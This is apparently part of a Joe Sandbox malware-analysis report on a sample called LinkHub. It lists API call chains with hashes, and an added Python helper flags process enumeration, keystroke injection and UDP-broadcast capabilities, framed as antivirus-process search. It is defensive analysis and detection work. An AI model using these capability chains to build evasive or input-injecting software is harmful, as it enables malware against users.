                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 044334f05148094b770f7a75df5f9539767e674478b6ae4378e71db193283e21
                                                                    • Instruction ID: c0d42a96c0d0d4613bb0b0905ac6bfb05fb869ea7f0359781660c7bc6130ae9d
                                                                    • Opcode Fuzzy Hash: 044334f05148094b770f7a75df5f9539767e674478b6ae4378e71db193283e21
                                                                    • Instruction Fuzzy Hash: AAC13B75A00206AFDB14CF98C894BAEB7B5FF88704F20859AE615DB351D731EE81DB90
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: __alldvrm$_strrchr
                                                                    • String ID:
                                                                    • API String ID: 1036877536-0
                                                                    • Opcode ID: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
                                                                    • Instruction ID: b36e712fd2c3749e192a6257da97393e9daaa44ee955bb84a5225de4e6521f9e
                                                                    • Opcode Fuzzy Hash: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
                                                                    • Instruction Fuzzy Hash: F1A1AC729007879FDB29CF18C8917AEBBE4EF97318F14416DE5A59B241C3B48E41C750
                                                                    APIs
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00D10BD4,?), ref: 00CD0EE0
                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00D10BD4,?), ref: 00CD0EF8
                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00D0DCE0,000000FF,?,00000000,00000800,00000000,?,00D10BD4,?), ref: 00CD0F1D
                                                                    • _memcmp.LIBVCRUNTIME ref: 00CD0F3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                    • String ID:
                                                                    • API String ID: 314563124-0
                                                                    • Opcode ID: 9b3c2bce399ccd1e8de74b87d433acf0af3f5358dcf265dd7d6c41205a528344
                                                                    • Instruction ID: 1df5434dd51fe086f885a0e510a02891885ab9d95e42507382d9da11a3c4488d
                                                                    • Opcode Fuzzy Hash: 9b3c2bce399ccd1e8de74b87d433acf0af3f5358dcf265dd7d6c41205a528344
                                                                    • Instruction Fuzzy Hash: 8C811971A00109EFCB04DFD8C988EEEB7B9FF89315F204559E516AB250DB71AE46CB60
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00CFB10C
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00CFB11A
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00CFB1FC
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CFB20B
                                                                       • Part of subcall function 00C8E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00CB4D73,?), ref: 00C8E395 (locale 0x0409 is en-US, flag 1 is NORM_IGNORECASE: a case-insensitive string compare)
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                    • String ID:
                                                                    • API String ID: 1991900642-0
                                                                    • Opcode ID: cc1dfb39922fce9e4230ac298ef15306589d40aeb9020b8cbb2907c77464b433
                                                                    • Instruction ID: 18dd2d434f3cedf733340336ef7e30d608f89421acb99aca04d55ecd3a156bf2
                                                                    • Opcode Fuzzy Hash: cc1dfb39922fce9e4230ac298ef15306589d40aeb9020b8cbb2907c77464b433
                                                                    • Instruction Fuzzy Hash: 50514BB1508304AFD350EF24C886A6BBBE8FF88754F40891DF59997251EB70ED04DB92
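The Toolhelp32 walk listed above (CreateToolhelp32Snapshot, Process32FirstW/Process32NextW, with a CompareStringW subcall) is the call shape behind the report's "Search for Antivirus process" signature, and the WSOCK32 and keyboard blocks further down in this listing carry the same kind of capability signal. The following Python is an added example, not part of the Joe Sandbox report and not Remcos or Joe Sandbox code: it parses function blocks in this listing format into per-function API sequences and flags a few such chains. The rule names, the small ordinal table and the sample text (three blocks copied from this report) are this example's own assumptions; the constants it checks are standard Win32/Winsock values (AF_INET=2, SOCK_DGRAM=2, IPPROTO_UDP=0x11, SOL_SOCKET=0xFFFF, SO_BROADCAST=0x20, WM_CHAR=0x102).

```python
"""Triage helper for Joe Sandbox function listings (added example, not report code).

Parses the "APIs" blocks of a listing into per-function API call sequences
and flags capability chains. Rules and sample text are this example's own."""
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional

# Constructed sample: three function blocks copied from the report above.
SAMPLE = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00CFB10C
• Process32FirstW.KERNEL32(00000000,?), ref: 00CFB11A
  • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
• Process32NextW.KERNEL32(00000000,?), ref: 00CFB1FC
• CloseHandle.KERNEL32(00000000), ref: 00CFB20B
  • Part of subcall function 00C8E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00CB4D73,?), ref: 00C8E395
Memory Dump Source
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00CF255A
• WSAGetLastError.WSOCK32 ref: 00CF2568
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00CF25E7
• WSAGetLastError.WSOCK32 ref: 00CF25F1
Memory Dump Source
APIs
• GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00CDB473
• SetKeyboardState.USER32(00000080), ref: 00CDB48F
• PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00CDB4FD
• SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00CDB54F
Memory Dump Source
"""

@dataclass
class Call:
    name: str                  # API name as listed, or resolved from an ordinal
    lib: str                   # module the call resolves to, e.g. KERNEL32
    args: List[str]            # argument literals as printed ('?' = unknown)
    ref: str                   # address of the call site
    subcall_of: Optional[str]  # callee address for "Part of subcall function" lines

@dataclass
class Function:
    calls: List[Call] = field(default_factory=list)

    def names(self, direct_only: bool = False) -> set:
        return {c.name for c in self.calls if not (direct_only and c.subcall_of)}

    def find(self, name: str) -> List[Call]:
        return [c for c in self.calls if c.name == name]

# Exports the listing prints by ordinal (#N). WSOCK32.dll ordinal 21 is setsockopt,
# 23 is socket. Assumed/partial table; extend as needed.
ORDINALS = {("WSOCK32", "#21"): "setsockopt", ("WSOCK32", "#23"): "socket"}

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-F]+):\s*)?"
    r"(?P<name>[#\w]+)\.(?P<lib>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")

def parse_listing(text: str) -> List[Function]:
    """One Function per 'APIs' block; a block ends at 'Memory Dump Source'."""
    funcs: List[Function] = []
    current: Optional[Function] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = Function()
            funcs.append(current)
            continue
        if stripped == "Memory Dump Source":
            current = None
            continue
        m = API_LINE.match(line) if current is not None else None
        if not m:
            continue
        name = ORDINALS.get((m["lib"], m["name"]), m["name"])
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        current.calls.append(Call(name, m["lib"], args, m["ref"], m["callee"]))
    return funcs

def rule_process_enum(fn: Function) -> bool:
    """Toolhelp32 walk of the process list plus a string compare."""
    n = fn.names()
    walk = {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"} <= n
    return walk and bool(n & {"CompareStringW", "lstrcmpiW", "_wcsicmp", "_wcsnicmp"})

def rule_keystroke_injection(fn: Function) -> bool:
    """SendInput, or a forced keyboard state followed by a posted WM_CHAR (0x102)."""
    n = fn.names()
    wm_char = any(len(c.args) > 1 and c.args[1] == "00000102" for c in fn.find("PostMessageW"))
    return "SendInput" in n or ("SetKeyboardState" in n and wm_char)

def rule_udp_broadcast(fn: Function) -> bool:
    """socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP) + setsockopt(SOL_SOCKET, SO_BROADCAST)."""
    udp = any(c.args[:3] == ["00000002", "00000002", "00000011"] for c in fn.find("socket"))
    bcast = any(len(c.args) > 2 and c.args[1] == "0000FFFF" and c.args[2] == "00000020"
                for c in fn.find("setsockopt"))
    return udp and bcast

RULES: Dict[str, Callable[[Function], bool]] = {
    "process enumeration with name compare": rule_process_enum,
    "keystroke injection": rule_keystroke_injection,
    "UDP broadcast socket": rule_udp_broadcast,
}

def triage(text: str) -> List[List[str]]:
    """Per parsed function, the names of the rules it satisfies (in RULES order)."""
    return [[name for name, rule in RULES.items() if rule(fn)] for fn in parse_listing(text)]

if __name__ == "__main__":
    for i, hits in enumerate(triage(SAMPLE)):
        print(f"function block {i}: {hits or ['no rule matched']}")
```

Rules are plain callables over the parsed Function, so argument values (the WM_CHAR message id, the socket family and option constants) can be checked rather than only API names; subcall lines are kept with their callee address so a rule can restrict itself to direct calls via names(direct_only=True).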
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 0e2c764ff8b15e2f45f1b2219dea4a53e7f6fafa7047418129e12f160dae04ee
                                                                    • Instruction ID: 07f8afb3a50a8e823a47c258d4d541d341ff7cc4de0ad166ef62e963c8aa0590
                                                                    • Opcode Fuzzy Hash: 0e2c764ff8b15e2f45f1b2219dea4a53e7f6fafa7047418129e12f160dae04ee
                                                                    • Instruction Fuzzy Hash: 48413E31900211ABDB207BBE9C56AFE3BA4FF46370F5D0125FC28E71D1DB754A416261
                                                                    APIs
                                                                     • socket.WSOCK32(00000002,00000002,00000011), ref: 00CF255A (AF_INET, SOCK_DGRAM, IPPROTO_UDP: a UDP socket)
                                                                     • WSAGetLastError.WSOCK32 ref: 00CF2568
                                                                     • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00CF25E7 (WSOCK32 ordinal 21 is setsockopt; level 0xFFFF is SOL_SOCKET, option 0x20 is SO_BROADCAST)
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF25F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$socket
                                                                    • String ID:
                                                                    • API String ID: 1881357543-0
                                                                    • Opcode ID: ec3bb9e3c7b3628f9d8f7db291e182dda167409d9975a45a9ef4eff58165ca8c
                                                                    • Instruction ID: 455006d8e58ecf23f2f22061ac15eebb78da6af7b742dff83acc27dbc31fd71a
                                                                    • Opcode Fuzzy Hash: ec3bb9e3c7b3628f9d8f7db291e182dda167409d9975a45a9ef4eff58165ca8c
                                                                    • Instruction Fuzzy Hash: CA41D475A40204AFE720AF24C886F2677E5AB48758F54C498FA1A8F3D2C771ED42DB91
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00D06D1A
                                                                    • ScreenToClient.USER32(?,?), ref: 00D06D4D
                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00D06DBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientMoveRectScreen
                                                                    • String ID:
                                                                    • API String ID: 3880355969-0
                                                                    • Opcode ID: c74d883058c8ed85479377dc9eb6b91625747a712c1cbe5e45cd56f3a87aaba3
                                                                    • Instruction ID: 6dd44e2631b174780b23d2645a72b46635819d5e8467a96b2ae352c91047960c
                                                                    • Opcode Fuzzy Hash: c74d883058c8ed85479377dc9eb6b91625747a712c1cbe5e45cd56f3a87aaba3
                                                                    • Instruction Fuzzy Hash: 38511B75A00209EFCF24DF64D880AAE7BB6FF45720F248159F9599B290D730ED91CB60
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: db66e12045fef48ed33110406db4ddcc563036086a28706a10c825786304e8c8
                                                                    • Instruction ID: 37ff7ad3c5b9e1b129ddf1649e73d0ee7a43477ff04f06817c306d70b836652a
                                                                    • Opcode Fuzzy Hash: db66e12045fef48ed33110406db4ddcc563036086a28706a10c825786304e8c8
                                                                    • Instruction Fuzzy Hash: 5C412571A00705AFD724AF7CDC41BAABBACEB89714F10852AF015DB2C2D7759E019B90
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CE61C8
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00CE61EE
                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CE6213
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CE623F
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 3321077145-0
                                                                    • Opcode ID: e6679cf1551694e5bbe64be73f8afcdbe6f3ec7c257cc56870cda88e3ce3212e
                                                                    • Instruction ID: 0b3c50e4afdfdea151ebbad8c59859d5466e92feb704b97c68af636107b6c566
                                                                    • Opcode Fuzzy Hash: e6679cf1551694e5bbe64be73f8afcdbe6f3ec7c257cc56870cda88e3ce3212e
                                                                    • Instruction Fuzzy Hash: B7414939600611DFCB11EF65C585A1EBBE2FF99710B18C488E95AAB362CB30FD05DB91
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00C970E1,00000000,00000000,00C98649,?,00C98649,?,00000001,00C970E1,8BE85006,00000001,00C98649,00C98649), ref: 00CADC90
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CADD19
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00CADD2B
                                                                    • __freea.LIBCMT ref: 00CADD34
                                                                      • Part of subcall function 00CA3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA3BC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                    • String ID:
                                                                    • API String ID: 2652629310-0
                                                                    • Opcode ID: 8e8899d26ffe21162243123d41bfd700b635120eeb6f3417767cc0afb00851ef
                                                                    • Instruction ID: e3c200f0fc50d7d899dc0bcded398d5d54ab55597ca7bfb687dbd7d5db64b0b3
                                                                    • Opcode Fuzzy Hash: 8e8899d26ffe21162243123d41bfd700b635120eeb6f3417767cc0afb00851ef
                                                                    • Instruction Fuzzy Hash: A731C172A0020AABDF248F64DC45EEE7BA6EF41718F154129FC16D7250EB35CE51DBA0
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00CDB473
                                                                    • SetKeyboardState.USER32(00000080), ref: 00CDB48F
                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00CDB4FD
                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00CDB54F
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: 759bb31d001eaade0e5d151966c4e1498cbef9dd05a52d83775310ed908a97e9
                                                                    • Instruction ID: 29d13918c15a178483c6012df85f1995c22f6b34df09ff21f7c9958686454131
                                                                    • Opcode Fuzzy Hash: 759bb31d001eaade0e5d151966c4e1498cbef9dd05a52d83775310ed908a97e9
                                                                    • Instruction Fuzzy Hash: E5312470A00208EEFF31CA6598057FA7BB6AB49310F05821BF6A6963D2D374CE419761
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00CDB5B8
                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00CDB5D4
                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00CDB63B
                                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00CDB68D
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: 4279e9e4f60df2d64e7111c27daf5202695e2db9bb8e75e506b52e39c832b932
                                                                    • Instruction ID: 58e54bfbf900bc8c4260e2bd3c232141dbe16dcd7fdb4a839a6505d71ab9698b
                                                                    • Opcode Fuzzy Hash: 4279e9e4f60df2d64e7111c27daf5202695e2db9bb8e75e506b52e39c832b932
                                                                    • Instruction Fuzzy Hash: B931083094060CEEFF288B658805BFABBA6AF85310F05422BF695963D1D774CF479B61
                                                                    APIs
                                                                    • ClientToScreen.USER32(?,?), ref: 00D080D4
                                                                    • GetWindowRect.USER32(?,?), ref: 00D0814A
                                                                    • PtInRect.USER32(?,?,?), ref: 00D0815A
                                                                    • MessageBeep.USER32(00000000), ref: 00D081C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1352109105-0
                                                                    • Opcode ID: 2e85ef2505648f28990b71ce4e97711061d2c9727d33af91cccb5b95ce33a158
                                                                    • Instruction ID: 52feb37f2838b292cecbfb76fbbdfd647f73ef06bf72883a17e45dc18e2a9aff
                                                                    • Opcode Fuzzy Hash: 2e85ef2505648f28990b71ce4e97711061d2c9727d33af91cccb5b95ce33a158
                                                                    • Instruction Fuzzy Hash: C4414A34A01315EFCB11CF58C884BA9B7B5FF49314F1841A9E999DB3A1CB71A842DF61
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 00D02187
                                                                      • Part of subcall function 00CD4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD43AD
                                                                      • Part of subcall function 00CD4393: GetCurrentThreadId.KERNEL32 ref: 00CD43B4
                                                                      • Part of subcall function 00CD4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00CD2F00), ref: 00CD43BB
                                                                    • GetCaretPos.USER32(?), ref: 00D0219B
                                                                    • ClientToScreen.USER32(00000000,?), ref: 00D021E8
                                                                    • GetForegroundWindow.USER32 ref: 00D021EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    • Opcode ID: 4cbb1245e9d2bef7fefda899b180b226e0782868b7a0a810006d00ba2de11b09
                                                                    • Instruction ID: 3f7461a103edfa9c1124e6198fc008cac18028a4bf8710c869bd27425a3dc3cb
                                                                    • Opcode Fuzzy Hash: 4cbb1245e9d2bef7fefda899b180b226e0782868b7a0a810006d00ba2de11b09
                                                                    • Instruction Fuzzy Hash: 1A317271D01209AFCB04EFA9C885DAEB7F8EF48304B5480AAE519E7351DB71DE45DBA0
                                                                    APIs
                                                                      • Part of subcall function 00C741EA: _wcslen.LIBCMT ref: 00C741EF
                                                                    • _wcslen.LIBCMT ref: 00CDE8E2
                                                                    • _wcslen.LIBCMT ref: 00CDE8F9
